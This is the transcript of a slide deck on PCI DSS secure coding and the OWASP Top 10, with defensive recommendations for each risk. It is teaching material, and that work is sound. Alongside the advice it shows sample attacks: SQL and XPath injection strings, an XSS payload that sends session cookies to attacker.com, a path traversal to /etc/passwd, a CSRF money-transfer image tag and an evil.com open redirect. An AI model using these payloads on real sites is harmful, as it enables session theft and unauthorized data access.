SlideShare a Scribd company logo

PCI security requirements secure coding and code review 2014

Haitham Raik
Haitham Raik
Technology
1 of 61
PCI Security Requirements – Secure Coding & Code Review Tips Haitham Raik
Overview  PCI DSS is a security standard that includes requirements for:  security management,  policies,  procedures,  network architecture,  software design and other critical protective measures  PCI DSS purpose: to help the organizations to protect customer account data.  This session doesn‟t cover all the security requirements.  This session covers only what has impact on our code.
OWASP Top 10  OWASP top 10 educates developers, designers, managers, and organizations about the most important security risks.  OWASP top 10 provides basic techniques to protect against the high risk security problems.
OWASP Top 10 - Injection  Injection flows, such as SQL, OS, Xpath, and LDAP injection occur when untrusted data is sent to an interpreter.  This data can trick the interpreter to execute unintended commands or accessing unauthorized data.  Threat Agents: anyone who can send data to the system.  Exploitability: Easy  Prevalence: Common  Detectability: Average  Impact: Severe
OWASP Top 10 - Injection  SQL Injection Example:  String sqlString = "SELECT * FROM users WHERE fullname = '" + form.getFullName() + "' AND password = '" + form.getPassword() + "'";  Case 1: full name: Haitham, password: 123pass  Result: SELECT * FROM users WHERE username = „Haitham' AND password = '123pass'  Case 2: full name: Ala' Ahmad, password: 123pass  Result: SELECT * FROM users WHERE username = 'Ala' Ahmad' AND password = „13pass'  Case 3: full name: blah, password: ' OR '1' = '1  Result: SELECT * FROM users WHERE username = 'blah' AND password = '' OR '1' = '1'
OWASP Top 10 - Injection  XPath Injection Example:  XML file: <?xml version="1.0" encoding="utf-8"?> <employees> <employee id="AS1" firstname="John" salary=“100"/> <employee id="AS2" firstname=“Adam“ salary=“200"/> </employees>  XPATH expression: String exp = “/employees/employee[@id=„”+form.getEID()+”']”  User Input: Emp_ID=‘ or '1'='1 Result: /employees/employee[@id=„‘ or '1'='1']
OWASP Top 10 - Injection  Injection Protection:  The preferred option is to use a safe API which provides a parameterized interface. String stmt = “select * from emp where id=?”; PreparedStatement pstmt = con.prepareStatement(stmt); pstmt.setString(1, empId);  If a parameterized API is not available, escape the special characters. String exp = “/employees/employee[@id=„”+ ESAPI.encoder().encodeForXPath(form.getEID())+ ”']”  If special characters are not required in the input, then the white-list validation is also recommended.
OWASP Top 10 - Injection  References:  https://www.owasp.org/index.php/SQL_Injection_Preventi on_Cheat_Sheet  https://www.owasp.org/index.php/Query_Parameterizatio n_Cheat_Sheet  https://www.owasp.org/index.php/Command_Injection  https://www.owasp.org/index.php/Testing_for_SQL_Injecti on_(OWASP-DV-005)
OWASP Top 10 - Broken Authentication and Session Management  Functions related to authentication and session management are often not implemented correctly.  Allow attackers to compromise passwords, keys, or session tokens.  Threat Agents: anyone who may attempt to steal accounts from others to impersonate them.  Exploitability: Average  Prevalence: Widespread  Detectability: Average  Impact: Severe
OWASP Top 10 - Broken Authentication and Session Management  Broken Authentication Examples:  Application supports URL re-writing, putting session IDs in the URL: http://example.com/sale/saleitems;jsessionid= 2P0OC2JSNDLPSKHCJUN2JV  if an authenticated user emailed the above link to his friends to see the sale, he will give also his session ID.  Application‟s timeout aren‟t set properly. User uses a public computer to access a site and forgot to logout.  User passwords are not hashed and internal attacker gains access to the password database.
OWASP Top 10 - Broken Authentication and Session Management  Session Management Examples:  Session Hijacking attacks compromises the session token by stealing or predicting a valid session ID to gain unauthorized access.  Session ID can be compromised in different ways:  If application generates predictable session IDs (For example using sequencer).  Session Sniffing  XSS  Man in the middle attack  Man in the browser attack
OWASP Top 10 - Broken Authentication and Session Management  Session Management Examples:  Application allow session fixation:
OWASP Top 10 - Broken Authentication and Session Management  Authentication Recommendations:  Implement Proper Password Policy:  Minimum length should be enforced by application; shorter than 10 characters considered weak.  Application should enforce password complexity; at least 1 upper case char, at least 1 lowercase char, at least 1 digit and at least 1 special char.  Changing password should be EASY.  Store Passwords hashed using strong algorithm (SHA2).  Transmit passwords only over TLS.  Require Re-authentication for sensitive requests (This also protect against XSS and CSRF attacks)  for example: shipping a purchase requests.
OWASP Top 10 - Broken Authentication and Session Management  More Authentication Recommendation:  Application must respond to failed login with generic message;  “Login Failed; Invalid UserID or password”  Application must prevent Brute-Force Attacks (prevent attacker to guess a password);  Account must be locked out if more than a preset number of failed logins are made.  Use a single authentication point.  Password must not be exposed in URL or hidden field.  Password autocomplete should always be disabled. <INPUT TYPE="password" AUTOCOMPLETE="off"> <form … AUTOCOMPLETE="off">
OWASP Top 10 - Broken Authentication and Session Management  Session Protection Recommendations:  It is recommended to use JEE built-in session management. request.getSession();  Transmit session IDs only over TLS  Use Cookies for session ID exchange with following attributes:  Secure Attribute; instruct the browser to only send session Id over HTTPS jsessionid=2P0OC2JSNDLPSKHCJUN2JV;Secure  HTTPOnly Attribute; instruct the browser not to allow malicious scripts to access the cookies. jsessionid=2P0OC2JSNDLPSKHCJUN2JV;HTTPOnly  Domain and Path attributes; instruct the browser to only send the cookie to the specified domain and all sub-domains. jsessionid=2P0OC2JSNDLPSKHCJUN2JV;Domain=docs.foo.co m;Path=/accounts;
OWASP Top 10 - Broken Authentication and Session Management  More Session Protection Recommendations:  Invalidate the Session ID after any privilege level change for the associated user. session.invalidate();  The session ID regeneration is mandatory to prevent session fixation attacks.  Set Session timeout:  2-5 minutes for high-value applications  15-30 minutes for low-value applications <web-app ...> <session-config> <session-timeout>20</session-timeout> </session-config> </web-app>
OWASP Top 10 - Broken Authentication and Session Management  More Session Protection Recommendations:  Force session logout on browser close event using javascript window.addEventListener('unload', function() { var xhr = new XMLHttpRequest(); xhr.open('GET', „Logout.jsp', false); xhr.send(null); }, false);  Prevent simultaneous logons.
OWASP Top 10 - Broken Authentication and Session Management  Detection:  User credentials aren‟t stored securely.  Session IDs/Passwords are exposed in the URL.  Session IDs/Passwords are exposed in hidden fields.  Session IDs don‟t timeout.  Session IDs aren‟t properly invalidated during logout.  Session IDs aren‟t rotated after successful login (this is required to prevent session fixation).  Passwords and session IDs are sent over unencrypted connections.  No lockout mechanism is implemented.  Browser offers to remember any account credentials.  Password is printed clear in the system logs.
OWASP Top 10 - Broken Authentication and Session Management  References:  https://www.owasp.org/index.php/Authentication_Cheat_S heet  https://www.owasp.org/index.php/Session_Management_ Cheat_Sheet
OWASP Top 10 – Cross-Site Scripting (XSS)  XSS occur whenever an application takes untrusted data and sends it to browser without proper validation or escaping.  XSS allows attackers to execute scripts in the victim‟s browser which can hijack user sessions or redirect the user to malicious sites.  Threat Agents: anyone who can send untrusted data to the system.  Exploitability: Average  Prevalence: Very Widespread  Detectability: Easy  Impact: Moderate
OWASP Top 10 – Cross-Site Scripting (XSS)
OWASP Top 10 – Cross-Site Scripting (XSS)  Examples:  Application uses untrusted data in the construction of HTML response: (String) page += "<input name='creditcard' type='TEXT„ value='" + request.getParameter("CC") + "'>"; The attacker modifies the „CC‟ parameter in his browser to: '><script>document.location= 'http://www.attacker.com/cgi-bin/cookie.cgi? foo='+document.cookie</script>'. This causes the victim‟s session ID to be sent to the attacker‟s website.
OWASP Top 10 – Cross-Site Scripting (XSS)  More XSS protection:  The preferred option is to properly escape all untrusted data based on the HTML context.  String safe = ESAPI.encoder().encodeForHTML( request.getParameter( "input" ) );  ESAPI.encoder().encodeForHTMLAttribute( request.getParameter( "input" ) );  ESAPI.encoder().encodeForJavaScript( request.getParameter( "input" ) );  Whitelist input validation is also recommended; validation should validate the length, characters, format, and business rules.  For rich content, use auto-sanitization libraries like OWASP AntiSamy.  Use HTTPOnly & Secure attributes
OWASP Top 10 – Cross-Site Scripting (XSS)  More XSS Protection:  Implement Content Security Policy; CSP is a browser side mechanism to create source whitelists for client side resources. Content-Security-Policy: default-src: 'self'; script-src: 'self' static.domain.tld  Browser will load all resources only from page‟s origin  Browser will load javascript only from page‟s origin and static.domain.tld
OWASP Top 10 – Cross-Site Scripting (XSS)  References:  https://www.owasp.org/index.php/XSS_(Cross_Site_Scrip ting)_Prevention_Cheat_Sheet  https://www.owasp.org/index.php/Cross- site_Scripting_(XSS)  http://owasp-esapi- java.googlecode.com/svn/trunk_doc/latest/org/owasp/esa pi/Encoder.html  https://www.owasp.org/index.php/AntiSamy  https://www.owasp.org/index.php/Content_Security_Polic y
OWASP Top 10 – Insecure Direct Object References  DOR occurs when a reference is exposed to an internal object, such as:  Directory, file, database key.  Without proper protection attacker can manipulate these references to access unauthorized data.  Threat Agents: authorized user who has partial access to certain functions.  Exploitability: Easy  Prevalence: Common  Detectability: Easy  Impact: Moderate
OWASP Top 10 – Insecure Direct Object References  Examples:  The application uses unverified data in a SQL call that is accessing account information: String query = "SELECT * FROM accts WHERE account = ?"; PreparedStatement pstmt = connection.prepareStatement(query , … ); pstmt.setString( 1, request.getParameter("acct")); ResultSet results = pstmt.executeQuery( );  The attacker simply modifies the „acct‟ parameter to send whatever account number he wants http://example.com/app/accountInfo?acct=notmyacct
OWASP Top 10 – Insecure Direct Object References  More Examples:  http://www.example.com/GetFile?fileName=image.jpg  What will happen if user manipulated with the above URL as following: http://www.example.com/GetFile?fileName=../../etc/passw d
OWASP Top 10 – Insecure Direct Object References  DOS Prevention:  Use per session indirect object references.  This prevents attacker from directly targeting unauthorized resources.  Check access  Each use of a direct object reference must include and access control check.  Check access vs. Indirect object reference  Authorization:  May require an extra DB hit  Exposes actual ID  Indirect object reference  May not require an extra DB hit  Hides actual ID  Requires a bit of extra coding and some extra information  Not very popular
OWASP Top 10 – Insecure Direct Object References  References:  https://www.owasp.org/index.php/Top_10_2007- Insecure_Direct_Object_Reference  http://cwe.mitre.org/data/definitions/22.html
OWASP Top 10 – Security Misconfiguration  Security Misconfiguration occurs when default setup and configuration is used and no regular updates are performed on software.  Threat Agents: Anyone who want to compromise the system.  Exploitability: Easy  Prevalence: Common  Detectability: Easy  Impact: Moderate
OWASP Top 10 – Security Misconfiguration  Recommendations:  Secure settings should be defined, implemented and maintained, as defaults are often insecure.  Perform regular updates on software
OWASP Top 10 – Sensitive Data Exposure  Occur when sensitive data (such as credit card) are not properly protected.  Attackers may steal or modify such weakly protected data.  Threat Agents: Anyone who access to the sensitive data. This include data in DB, in transit, and even in users browser.  Exploitability: Difficult  Prevalence: Uncommon  Detectability: Average  Impact: SEVERE
OWASP Top 10 – Sensitive Data Exposure  Examples:  A site doesn‟t use SSL for pages capture sensitive data.  Attacker monitors network traffic and steals the user‟s sensitive data.  The password database uses unsalted hashes to store passwords.  Attacker may use rainbow table of pre-calculated hashes to compromise the plain passwords.
OWASP Top 10 – Sensitive Data Exposure  Recommendations:  Determine what is the data you want to protect.  Only store sensitive data that you need  Only use strong cryptographic algorithms; AES, RSASHA- 256  Ensure that random numbers are cryptographically strong  Java.security.SecureRandom  Store the passwords hashed and salted.  Define a key lifecycle.  Store Card numbers encrypted and/or Masked.  Use TLS for all login pages  Use TLS for channels transmitting sensitive data.  Don‟t mix non-TLS and TLS contents
OWASP Top 10 – Sensitive Data Exposure  More Recommendations:  Use “Secure” Cookie flag  Keep sensitive data out of the URL  Prevent Caching of sensitive data:  Add HTTP response headers; "Cache-Control: no-cache, no- store“, "Expires: 0“, and "Pragma: no-cache“  Disable TLS compression  Use Fully Qualified Names in Certificates  Do Not Use Wildcard Certificates
OWASP Top 10 – Sensitive Data Exposure  References:  http://en.wikipedia.org/wiki/Rainbow_table  https://www.owasp.org/index.php/Cryptographic_Storage _Cheat_Sheet  https://www.owasp.org/index.php/Password_Storage_Ch eat_Sheet  https://www.owasp.org/index.php/Transport_Layer_Protec tion_Cheat_Sheet
OWASP Top 10 – Missing Function Level Access Control  With this threat, the attacker changes the URL to access a privileged pages.  Threat Agents: Anyone; authorized user or anonymous user.  Exploitability: Easy  Prevalence: Common  Detectability: Average  Impact: Moderate
OWASP Top 10 – Missing Function Level Access Control  Examples:  User changes URL from: http://www.example.com/get_info  To: http://www.example.com/get_Admin_Info  A page provides an action parameter to specify the function being invoked and user changed the action value.
OWASP Top 10 – Missing Function Level Access Control  Recommendations:  Ensure the access control matrix is part of the business, architecture, and design of the application  Ensure that all URLs and business functions are protected by centralized and effective access control mechanism.  For example by using a servlet filter the intercepts all incoming requests to verify if the user is authorized to access the requested page  Just because your URL is hard to guess, doesn‟t mean it can‟t be found!  Put your UI files under /WEB-INF
OWASP Top 10 – Missing Function Level Access Control  More Recommendations:  Web applications should access the database through one or more limited accounts that do not have schema- modification privileges
OWASP Top 10 – Cross-Site Request Forgery (CSRF)  CSRF: forces logged-in victim to send a request to a vulnerable web application.  Threat Agents: Anyone.  Exploitability: Average  Prevalence: Common  Detectability: Easy  Impact: Severe
OWASP Top 10 – Cross-Site Request Forgery (CSRF)  Examples:  A hacker posts to a blog containing an image tag (blog site allows XSS):  <img src=“http://www.yourbank.com/transfer?to_acc=hacker_acc_nu m&amount=1000”/>  User logs into yourbank.com (session is active for user)  User visits the blog (without logging-out from yourbank.com)  Loading the image will send request to the bank site  The bank will transfer the user‟s money to hacker‟s account
OWASP Top 10 – Cross-Site Request Forgery (CSRF)  Recommendations:  Make sure there are no XSS vulnerabilities in your application; refer to XSS protection slides.  Do not use GET requests to perform transactional operations.  For sensitive transactions, re-authenticate.  Add a confirmation page.  Use CAPTCHA  Insert custom random tokens into every form and URL  CSRF token must be different on each request or at least on each session.  Use CSRFTester tool; CSRFTester give developers the ability to test their applications for CSRF flaws
OWASP Top 10 – Cross-Site Request Forgery (CSRF)  More Recommendations:  Do not use GET requests public void doGet(HttpServletRequest req, HttpServletResponse resp) { throw new Exception(“Invalid operation”); }
OWASP Top 10 – Cross-Site Request Forgery (CSRF)  References:  https://www.owasp.org/index.php/Cross- Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet  https://www.owasp.org/index.php/CSRFGuard  https://www.owasp.org/index.php/CSRFTester
OWASP Top 10 – Using Components with Known Vulnerabilities  Components, such as libraries, frameworks, and other software modules, almost always run with full privileges.  If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover  Threat Agents: Anyone.  Exploitability: Average  Prevalence: Widespread  Detectability: Difficult  Impact: Moderate
OWASP Top 10 – Using Components with Known Vulnerabilities  Examples:  Apache CXF Authentication Bypass – By failing to provide an identity token, attackers could invoke any web service with full permission.  Struts Vulnerabilities: http://www.cvedetails.com/vulnerability-list/vendor_id- 45/product_id-6117/Apache-Struts.html
OWASP Top 10 – Using Components with Known Vulnerabilities  Recommendations:  Identify all components and the versions you are using.  Monitor the security of these components in public databases; http://www.cvedetails.com/  Where appropriate, consider adding security wrappers around components to disable secure weak aspects of the component.  Always update the component to the latest version.
OWASP Top 10 – Un-validated Redirects and Forwards  Web applications usually redirect users to other pages, and use untrusted data to determine the destination pages.  Without proper validation, attackers can redirect victims to phishing sites.  Threat Agents: Anyone who can trick your users.  Exploitability: Average  Prevalence: Uncommon  Detectability: Easy  Impact: Moderate
OWASP Top 10 – Un-validated Redirects and Forwards  Examples:  The application has a page called “redirect.jsp” which takes a parameter named “url”.  The attacker emails to victim a malicious URL: http://www.example.com/redirect.jsp?url=evil.com
OWASP Top 10 – Un-validated Redirects and Forwards  Recommendations:  Simply avoid using redirects.  If used to, don‟t involve user parameters to determine the destination.  If parameters can‟t be avoided, ensure that the supplied value is valid.  Applications can use ESAPI to override the sendRedirect() method to make sure all redirect destinations are safe.
OWASP Top 10 – Un-validated Redirects and Forwards  References:  http://owasp-esapi- java.googlecode.com/svn/trunk_doc/latest/org/owasp/esa pi/filters/SecurityWrapperResponse.html#sendRedirect(ja va.lang.String)
Improper error handling  Providing too much information to the user when an error occurs.  Examples:  An error message with too much detail  Stack trace  Failed SQL statement
Improper error handling  Recommendation:  Write detailed error information to secure Log.  Configure an exception handler in the web.xml for all un- handled exceptions <error-page> <exception-type>java.lang.Throwable</exception-type> <location>/error.jsp</location> </error-page>
ClickJacking  Clickjacking occurs when your site can be embedded into other sites.  Attacker can lead user to believe they are typing-in the password to their email, but are instead typing into an invisible frame hijacks your keystrokes.  To Prevent ClickJacking, you need to prevent your site from being embedded in iframes.  Use X-FRAME-OPTIONS header:  DENY  SAMEORIGIN  ALLOW-FROM uri
Useful HTTP Response Headers Header Name Description Example Strict-Transport- Security Force every browser request to be sent over TLS/SSL Strict- Transport- Security: max- age=8640000; includeSubDo mains X-Frame- Options Provides Clickjacking protection X-Frame- Options: deny X-XSS- Protection This header enables the Cross-site scripting (XSS) filter built into most recent web browsers. It's usually enabled by default anyway, so the role of this header is to re-enable the filter for this particular website if it was disabled by the user. X-XSS- Protection: 1; mode=block X-Content-Type- Options The only defined value, "nosniff", prevents Internet Explorer and Google Chrome from MIME-sniffing a response away from the declared content-type. X-Content- Type-Options: nosniff
Useful HTTP Response Headers Header Name Description Example X-WebKit-CSP CSP prevents a wide range of attacks, including Cross-site scripting and other cross-site injections. X-WebKit-CSP: default-src 'self'
Useful HTTP Response Headers  Sample response from google.com: cache-control:private, max-age=0 content-encoding:gzip content-type:text/html; charset=UTF-8 date:Wed, 05 Mar 2014 11:21:10 GMT expires:-1 set-cookie:PREF=ID=3bb418586446f822; expires=Fri, 04-Mar-2016 11:21:10 GMT; path=/; domain=.google.com x-frame-options:SAMEORIGIN x-xss-protection:1; mode=block
Useful Tools  Code Review Tools:  CodeCrawler  Orizon  O2  FindSecurityBugs: This is a plugin for FindBugs  Application Penetration Testing Tools:  WebScarab  ZAP

Recommended

PCI Security Requirements - secure coding
PCI Security Requirements - secure codingPCI Security Requirements - secure coding
PCI Security Requirements - secure coding
Haitham Raik
 
OWASP Khartoum Top 10 A3 - 6th meeting
OWASP Khartoum Top 10 A3 - 6th meetingOWASP Khartoum Top 10 A3 - 6th meeting
OWASP Khartoum Top 10 A3 - 6th meeting
OWASP Khartoum
 
Avoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might thinkAvoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might think
Erlend Oftedal
 
OWASP Serbia - A3 broken authentication and session management
OWASP Serbia - A3 broken authentication and session managementOWASP Serbia - A3 broken authentication and session management
OWASP Serbia - A3 broken authentication and session management
Nikola Milosevic
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...
Noppadol Songsakaew
 
OWASP Serbia - A5 cross-site request forgery
OWASP Serbia - A5 cross-site request forgeryOWASP Serbia - A5 cross-site request forgery
OWASP Serbia - A5 cross-site request forgery
Nikola Milosevic
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root Causes
Marco Morana
 
Owasp top 10_openwest_2019
Owasp top 10_openwest_2019Owasp top 10_openwest_2019
Owasp top 10_openwest_2019
Sean Jackson
 

Recommended

PCI Security Requirements - secure coding
PCI Security Requirements - secure codingPCI Security Requirements - secure coding
PCI Security Requirements - secure coding
Haitham Raik
 
OWASP Khartoum Top 10 A3 - 6th meeting
OWASP Khartoum Top 10 A3 - 6th meetingOWASP Khartoum Top 10 A3 - 6th meeting
OWASP Khartoum Top 10 A3 - 6th meeting
OWASP Khartoum
 
Avoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might thinkAvoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might think
Erlend Oftedal
 
OWASP Serbia - A3 broken authentication and session management
OWASP Serbia - A3 broken authentication and session managementOWASP Serbia - A3 broken authentication and session management
OWASP Serbia - A3 broken authentication and session management
Nikola Milosevic
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...
Noppadol Songsakaew
 
OWASP Serbia - A5 cross-site request forgery
OWASP Serbia - A5 cross-site request forgeryOWASP Serbia - A5 cross-site request forgery
OWASP Serbia - A5 cross-site request forgery
Nikola Milosevic
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root Causes
Marco Morana
 
Owasp top 10_openwest_2019
Owasp top 10_openwest_2019Owasp top 10_openwest_2019
Owasp top 10_openwest_2019
Sean Jackson
 
S8-Session Managment
S8-Session ManagmentS8-Session Managment
S8-Session Managment
zakieh alizadeh
 
Web application security (eng)
Web application security (eng)Web application security (eng)
Web application security (eng)
Anatoliy Okhotnikov
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Brian Huff
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
bilcorry
 
Owasp webgoat
Owasp webgoatOwasp webgoat
Owasp webgoat
Zakaria SMAHI
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
Carol McDonald
 
Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) EuropeWakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Alexandre Morgaut
 
Owasp top 10_-_2010 presentation
Owasp top 10_-_2010 presentationOwasp top 10_-_2010 presentation
Owasp top 10_-_2010 presentation
Islam Azeddine Mennouchi
 
Top 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilitiesTop 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilities
Terrance Medina
 
Attques web
Attques webAttques web
Attques web
Tarek MOHAMED
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013
Edouard de Lansalut
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or Succeed
Prathan Phongthiproek
 
Session10-PHP Misconfiguration
Session10-PHP MisconfigurationSession10-PHP Misconfiguration
Session10-PHP Misconfiguration
zakieh alizadeh
 
OWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsOWASP Top 10 Proactive Controls
OWASP Top 10 Proactive Controls
Katy Anton
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013
tmd800
 
OWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesOWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root Causes
Marco Morana
 
Steps to mitigate Top 5 OWASP Vulnerabilities 2013
Steps to mitigate Top 5 OWASP Vulnerabilities 2013Steps to mitigate Top 5 OWASP Vulnerabilities 2013
Steps to mitigate Top 5 OWASP Vulnerabilities 2013
Jayasree Veliyath
 
Secure code practices
Secure code practicesSecure code practices
Secure code practices
Hina Rawal
 
Security asp.net application
Security asp.net applicationSecurity asp.net application
Security asp.net application
ZAIYAUL HAQUE
 
S5-Authorization
S5-AuthorizationS5-Authorization
S5-Authorization
zakieh alizadeh
 
QA Fest 2015. Юрий Федько. XSS - от простого к сложному!
QA Fest 2015. Юрий Федько. XSS - от простого к сложному!QA Fest 2015. Юрий Федько. XSS - от простого к сложному!
QA Fest 2015. Юрий Федько. XSS - от простого к сложному!
QAFest
 
Mobile Application Security - Broken Authentication & Management
Mobile Application Security - Broken Authentication & ManagementMobile Application Security - Broken Authentication & Management
Mobile Application Security - Broken Authentication & Management
Barrel Software
 

More Related Content

What's hot

Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) EuropeWakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Alexandre Morgaut
 
OWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesOWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root Causes
Marco Morana
 
Steps to mitigate Top 5 OWASP Vulnerabilities 2013
Steps to mitigate Top 5 OWASP Vulnerabilities 2013Steps to mitigate Top 5 OWASP Vulnerabilities 2013
Steps to mitigate Top 5 OWASP Vulnerabilities 2013
Jayasree Veliyath
 

What's hot (20)

S8-Session Managment
S8-Session ManagmentS8-Session Managment
S8-Session Managment
 
Web application security (eng)
Web application security (eng)Web application security (eng)
Web application security (eng)
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
 
Owasp webgoat
Owasp webgoatOwasp webgoat
Owasp webgoat
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
 
Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) EuropeWakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
 
Owasp top 10_-_2010 presentation
Owasp top 10_-_2010 presentationOwasp top 10_-_2010 presentation
Owasp top 10_-_2010 presentation
 
Top 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilitiesTop 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilities
 
Attques web
Attques webAttques web
Attques web
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or Succeed
 
Session10-PHP Misconfiguration
Session10-PHP MisconfigurationSession10-PHP Misconfiguration
Session10-PHP Misconfiguration
 
OWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsOWASP Top 10 Proactive Controls
OWASP Top 10 Proactive Controls
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013
 
OWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root CausesOWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root Causes
 
Steps to mitigate Top 5 OWASP Vulnerabilities 2013
Steps to mitigate Top 5 OWASP Vulnerabilities 2013Steps to mitigate Top 5 OWASP Vulnerabilities 2013
Steps to mitigate Top 5 OWASP Vulnerabilities 2013
 
Secure code practices
Secure code practicesSecure code practices
Secure code practices
 
Security asp.net application
Security asp.net applicationSecurity asp.net application
Security asp.net application
 
S5-Authorization
S5-AuthorizationS5-Authorization
S5-Authorization
 

Viewers also liked

Security Code Review: Magic or Art?
Security Code Review: Magic or Art?Security Code Review: Magic or Art?
Security Code Review: Magic or Art?
Sherif Koussa
 
Code review for secure web applications
Code review for secure web applicationsCode review for secure web applications
Code review for secure web applications
silviad74
 
Simplified Security Code Review Process
Simplified Security Code Review ProcessSimplified Security Code Review Process
Simplified Security Code Review Process
Sherif Koussa
 

Viewers also liked (18)

QA Fest 2015. Юрий Федько. XSS - от простого к сложному!
QA Fest 2015. Юрий Федько. XSS - от простого к сложному!QA Fest 2015. Юрий Федько. XSS - от простого к сложному!
QA Fest 2015. Юрий Федько. XSS - от простого к сложному!
 
Mobile Application Security - Broken Authentication & Management
Mobile Application Security - Broken Authentication & ManagementMobile Application Security - Broken Authentication & Management
Mobile Application Security - Broken Authentication & Management
 
Curso Concientización y Evaluación de las PCI DSS_Perú Septiembre 2014
Curso Concientización y Evaluación de las PCI DSS_Perú Septiembre 2014Curso Concientización y Evaluación de las PCI DSS_Perú Septiembre 2014
Curso Concientización y Evaluación de las PCI DSS_Perú Septiembre 2014
 
Security Code Review: Magic or Art?
Security Code Review: Magic or Art?Security Code Review: Magic or Art?
Security Code Review: Magic or Art?
 
Code review for secure web applications
Code review for secure web applicationsCode review for secure web applications
Code review for secure web applications
 
Scrum Process
Scrum ProcessScrum Process
Scrum Process
 
Null meet Code Review
Null meet Code ReviewNull meet Code Review
Null meet Code Review
 
Log Monitoring and File Integrity Monitoring
Log Monitoring and File Integrity MonitoringLog Monitoring and File Integrity Monitoring
Log Monitoring and File Integrity Monitoring
 
La junta de kickoff
La junta de kickoffLa junta de kickoff
La junta de kickoff
 
Introduction to PCI DSS
Introduction to PCI DSSIntroduction to PCI DSS
Introduction to PCI DSS
 
Simplified Security Code Review Process
Simplified Security Code Review ProcessSimplified Security Code Review Process
Simplified Security Code Review Process
 
Code review guidelines
Code review guidelinesCode review guidelines
Code review guidelines
 
Web Security: SQL Injection
Web Security: SQL InjectionWeb Security: SQL Injection
Web Security: SQL Injection
 
Sql injection
Sql injectionSql injection
Sql injection
 
GestióN De Proyectos ReunióN De Kickoff
GestióN De Proyectos ReunióN De KickoffGestióN De Proyectos ReunióN De Kickoff
GestióN De Proyectos ReunióN De Kickoff
 
Introducción a PCI DSS
Introducción a PCI DSSIntroducción a PCI DSS
Introducción a PCI DSS
 
«Вредоносные браузерные расширения и борьба с ними», Александра Сватикова (Од...
«Вредоносные браузерные расширения и борьба с ними», Александра Сватикова (Од...«Вредоносные браузерные расширения и борьба с ними», Александра Сватикова (Од...
«Вредоносные браузерные расширения и борьба с ними», Александра Сватикова (Од...
 
«Android Activity Hijacking», Евгений Блашко, Юрий Шабалин (АО «Сбербанк-Тех...
«Android Activity Hijacking», Евгений Блашко, Юрий Шабалин (АО «Сбербанк-Тех...«Android Activity Hijacking», Евгений Блашко, Юрий Шабалин (АО «Сбербанк-Тех...
«Android Activity Hijacking», Евгений Блашко, Юрий Шабалин (АО «Сбербанк-Тех...
 

